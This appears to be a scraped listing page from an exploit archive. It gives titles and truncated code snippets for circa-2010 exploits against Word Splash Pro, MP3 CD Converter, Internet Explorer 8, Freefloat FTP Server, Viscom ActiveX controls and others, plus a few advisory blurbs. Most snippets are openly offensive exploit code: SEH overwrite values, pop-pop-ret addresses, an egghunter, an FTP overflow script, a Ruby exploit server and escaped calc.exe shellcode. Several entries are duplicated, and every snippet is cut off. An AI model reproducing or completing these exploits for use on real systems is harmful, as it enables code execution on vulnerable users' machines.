Word Splash Pro <= 9.5 Buffer Overflow

Exploit for windows platform in category local exploits Exploit Title: Word Splash Pro Word list-Import then click on Word List Builder button my $file = "1.wsl"; my $size = 4112; my $nseh = "\xeb\x06\x90\x90"; jump 6 bytes my $seh = pack'V', 0x01de44dc; pop pop ret from CRDE2000.DLL my $egg =...

MP3 CD Converter Professional Buffer Overflow

!/usr/bin/python Python File Created BY C4SS!0 G0MES http://www.invasao.com.br [email protected] +Exploit Titule: Exploit Buffer Overflow MP3 CD Converter ProfessionalSEH +Date: 12/20/2010 +Author: C4SS!0 G0M3S +Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe +Version: 5.0.3...

MP3 CD Converter Professional - Local Buffer Overflow (SEH)

MP3 CD Converter Professional - Local Buffer Overflow SEH !/usr/bin/python Python File Created BY C4SS!0 G0MES http://www.invasao.com.br [email protected] +Exploit Titule: Exploit Buffer Overflow MP3 CD Converter ProfessionalSEH +Date: 12/20/2010 +Author: C4SS!0 G0M3S +Software Link:...

Word Splash Pro 9.5 - Local Buffer Overflow

Exploit Title: Word Splash Pro Word list-Import then click on Word List Builder button my $file = "1.wsl"; my $size = 4112; my $nseh = "\xeb\x06\x90\x90"; jump 6 bytes my $seh = pack'V', 0x01de44dc; pop pop ret from CRDE2000.DLL my $egg = "w00tw00t"; my $egghunter =...

MP3 CD Converter Professional - Local Buffer Overflow (SEH)

!/usr/bin/python Python File Created BY C4SS!0 G0MES http://www.invasao.com.br [email protected] +Exploit Titule: Exploit Buffer Overflow MP3 CD Converter ProfessionalSEH +Date: 12/20/2010 +Author: C4SS!0 G0M3S +Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe +Version: 5.0.3...

Internet Explorer 8 CSS Parser Exploit

No description provided by source. !/usr/bin/env ruby Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ Author: Nephi Johnson d0cs4vage require 'socket' def httpsendsock, data, opts= defaults = :code="200", :message="OK", :type="text/html" opts = defaults.mergeopts code...

Internet Explorer 8 CSS Parser Exploit

!/usr/bin/env ruby Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ Author: Nephi Johnson d0cs4vage require 'socket' def httpsendsock, data, opts= defaults = :code="200", :message="OK", :type="text/html" opts = defaults.mergeopts code = opts:code message = opts:message...

Altarsoft Audio Converter 1.1 Buffer Overflow Exploit (SEH)

Exploit for windows platform in category local exploits Exploit Title: Exploit Buffer Overflow Altarsoft Audio Converter 1.1SEH Date: 16/12/2010 Author: C4SS!0 G0M3S Software Link: http://www.altarsoft.com/downloads/AltarsoftAudioConverter.exe Version: 111 Tested on: WIN-XP SP3 PT-BR CVE: N/A...

DCE-RPC Fragmented Requests (CVE-2010-0102)

DCE/RPC stands for Distributed Computing Environment / Remote Procedure Calls. It is a Remote Procedure Call system that allows software to work across multiple computers, as if it were all working on the same computer. This system allows programmers to write distributed software without having t...

MS-RPC over CIFS Fragmentation (CVE-2010-0102)

DCE/RPC stands for Distributed Computing Environment / Remote Procedure Calls. It is a Remote Procedure Call system that allows software to work across multiple computers, as if it were all working on the same computer. This system allows programmers to write distributed software without having t...

Microsoft Internet Explorer 8 - CSS Parser

Microsoft Internet Explorer 8 - CSS Parser !/usr/bin/env ruby Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ Author: Nephi Johnson d0cs4vage require 'socket' def httpsendsock, data, opts= defaults = :code="200", :message="OK", :type="text/html" opts =...

Microsoft Internet Explorer 8 - CSS Parser

!/usr/bin/env ruby Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ Author: Nephi Johnson d0cs4vage require 'socket' def httpsendsock, data, opts= defaults = :code="200", :message="OK", :type="text/html" opts = defaults.mergeopts code = opts:code message = opts:message...

Winamp &quot;in_midi&quot;组件MIDI时间戳栈缓冲区溢出漏洞

BUGTRAQ ID: 45221 Winamp是一款流行的媒体播放器，支持多种文件格式。 Winamp在实现上存在漏洞，攻击者可利用此漏洞以用户权限在受影响的应用程序中执行任意代码，造成拒绝服务。 此漏洞源于未能对用户提供的数据执行足够的边界检查。Winamp的栈分配是可预测的。攻击者可选择写入到已保存的基本指针的值，因此当恢复了基础指针后，调用函数的栈报文将被移动到攻击者控制的返回地址。 Nullsoft Winamp 5.01 - 5.5.8 厂商补丁： Nullsoft -------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

Freefloat FTP Server Buffer Overflow Vulnerability 0day

Exploit for windows platform in category remote exploits ======================================================= Freefloat FTP Server Buffer Overflow Vulnerability 0day ======================================================= Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability Date:...

Viscom VideoEdit Gold ActiveX 8.0 - Code Execution

// Ctrl+C Ctrl+V, herpderp // calc.exe var shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+...

Freefloat FTP Server - Remote Buffer Overflow

Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability Date: 12/05/2010 Author: 0v3r Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Tested on: Windows XP SP3 EN CVE: N/A !/usr/bin/python import socket import sys def usage: print "usage : ./freefloatftp.py " pri...

Image Viewer CP Gold 6 Buffer Overflow

//payload is windows/exec cmd=calc.exe shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+...

MediaCoder 0.7.5.4795 Buffer Overflow

Exploit Title: MediaCoder-0.7.5.4795.exe 0-days Buffer Overflow SEH Date: 02 / 12 / 2010 Author: Oh Yaw Theng Software Link: http://www.mediacoderhq.com/mirrors.htm?file=MediaCoder-0.7.5.4795.exe Version: v0.7.5.4795 Latest Version !! Tested on: Microsoft Windows XP SP2 CVE : N / A The vendor is...

CVE-2 0 0 9-0 6 5 8 vulnerability analysis-vulnerability warning-the black bar safety net

Author: Peter Kleissnerhttp://web17.webbpro.de/index.php?page=analysing-the-pdf-exploit translation: Cryin' http://hi.baidu.com/justear I want to share with you 2 0 0 9 year 3 month of an Adobe pdf vulnerability analysis results, the vulnerability is due to JBIG2 compression of the BUG lead to th...

Viscom Image Viewer CP Gold 6 - ActiveX &#039;TifMergeMultiFiles()&#039; Remote Buffer Overflow

//payload is windows/exec cmd=calc.exe shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+...